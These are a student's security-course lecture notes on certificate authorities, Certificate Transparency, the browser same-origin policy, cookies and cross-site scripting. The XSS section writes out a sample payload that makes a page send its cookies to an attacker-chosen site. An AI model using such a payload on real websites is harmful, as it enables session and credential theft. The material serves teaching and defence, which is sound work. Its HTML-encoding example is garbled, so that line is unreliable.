Csep-564-Lec-6

Corporate CAs

Why would IT want all company machines to have an additional root cert installed, owned and controlled by IT?

  • Allow IT to see all HTTPS traffic, useful for enforcing security / privacy.

CA Challenges

  • Hash collisions

  • Weak security may allow attackers to issue rogue certs

  • Users don't notice when attacks happen (they may just proceed to http)

  • How do you revoke certs?

    • If you revoke one, you revoke everything downstream that depends on it!
  • DigiNotar, a Dutch Cert Authority got hacked.

    • All servers were unpatched, and public
    • All cert servers had admin password Pr0d@dm1n
    • No anti virus
  • In 2013, a rogue *.google.com cert originated from a Turkish CA and was trusted by every browser in the world.

  • DarkMatter attempted to get CA status, but never achieved it; weird stuff going on.

  • Symantec was a major company in the space, participated in standards for a while, but had very public mismanagement for a few years and was eventually distruted in 2018.

Certificate Transparency

  • Problem: browsers will think nothing is wrong with a rogue cert until revoked.
  • Goal: make it impossible for CA to issue a bad cert for a domain without the ownser of that domain knowing.
  • Approach: auditable certificate logs
    • Certs get published in public logs
    • Logs get checked for unexpected certs

Web Security

We're going to focus mostly on defending against "web" attacks. Not really network attacks (pretty much solved by TLS) or malware attacks client side.

  • There are three actors:
    • User/browser
    • Website A.com
    • Website B.com

Browser features:

  • Even if you visit an evil website, your browser should let you visit it safely!
  • If you visit an evil site and a good site, your browser should isolate them so that one can't infect/attack the other.
  • Safe delegation: a website should be able to safely embed another one that might have been compromised.

Explicit goals of the browser security model:

  1. Sandbox: Protect local system from web attacker
  2. Same Origin Policy: Protect/isolate web content from other web content
    Notice: these are really similar to the goals of an OS with respect to processes.

To achieve this,

  • javascript has
    • no direct file access
    • limited access to OS, network, browser data
  • tabs and iframes run in their own processes
    • and so get isolation guarantees by default via the OS

Same Origin Policy

where website origin = (scheme, domain, port) e.g. (https, thesurf.in, 443)

  • E.g. http://www.example.com/dir/page.html
    • can req things from http://www.example.com/dir/page2.html
    • cannot req things from http://www.example.com:81/dir/page2.html
    • cannot req things from http://en.example.com/dir/page2.html

Browser Cookies

  • HTTP is a stateless protocol
  • Browser cookies are used to introduce state
    • websites store small amount of info in the browser
      • using Header: Set-cookie with a key-val store.
    • used for authentication, personalization, tracking
    • cookies are often secrets

Sites can set cookies for all sites of the domain suffix.

  • i.e. login.example.com can set for *.example.com

Same Origin Policy for Scripts

When you

<script src="http://otherdomain.com/library.js"></script>

that script runs in the context of the embedding website! So the code from otherdomain can access html elements, cookies, etc. from the host example.com. So you better hope that shit don't get hijacked.

Cross Origin communication

Sometimes you need it!

  • For cross-origin network requests, you can allow a list of trusted domains.
    • But plz don't do this: Access-Control-Allow-Origin: * which effectively turns off SOP protection.
  • For cross-origin client side communication,
    • HTML5 postMessage between frames

Browser Plugins

  • E.g.: flash, Java, PDF reader
  • Goal: enable functionality that requires transcending the browser sandbox
  • Problem: increases attack surface

Good news though: sandboxing is improving and the needs for plugins are decreasing.

Browser Extensions

  • Not subject to same-origin policy
  • Users grant "fine-grained" permissions per extension
  • Upgrades incoming:
    • Manifest v3 spec
      • Upends how extensions get access to pages
      • Makes ad blockers way harder to implement smh

Web apps

Web apps are frikken complicated. There are a lot of moving pieces, and so a lot of areas for failure. Some of the most common vulns:

  • broken access control
  • cryptographic failures
  • injection
  • security misconfiguration

Cross-site scripting (XSS)

Let's assume this environment:

  • Server written in PHP
    • Form/query variables get put into e.g. $_POST, $_GET arrays.
  • evil.com has an iframe containing naive.com which outputs $_GET[name] as a greeting.
  • evil.com sets the iframe src to
    • naive.com/hello?name=<script>win.open(site + document.cookie)</script>

Basic pattern for Reflected XSS

  1. User visits malicious site
  2. User receives malicious page
  3. User sends request to server victim (because malicious page says to)
  4. Server victom echoes user input back to user.

Basic pattern for Stored CSS

  1. Attack server somehow injects malicious script to server victim
  2. User receives malicious script from victim server
  3. Inadvertently uploads data to attack server, at behest of malicious script

In all cases, there are three actors

  1. Adversary
  2. Server victim
  3. User victim

Preventing XSS

  • Any user input / client-side data must be preprocessed before it is used inside HTML.
  • Remove / encode HTML special chars (e.g. & -> &)
  • E.g. MySpace worm!

For Lab 2, there are broken ad hoc XSS filters that we need to get past!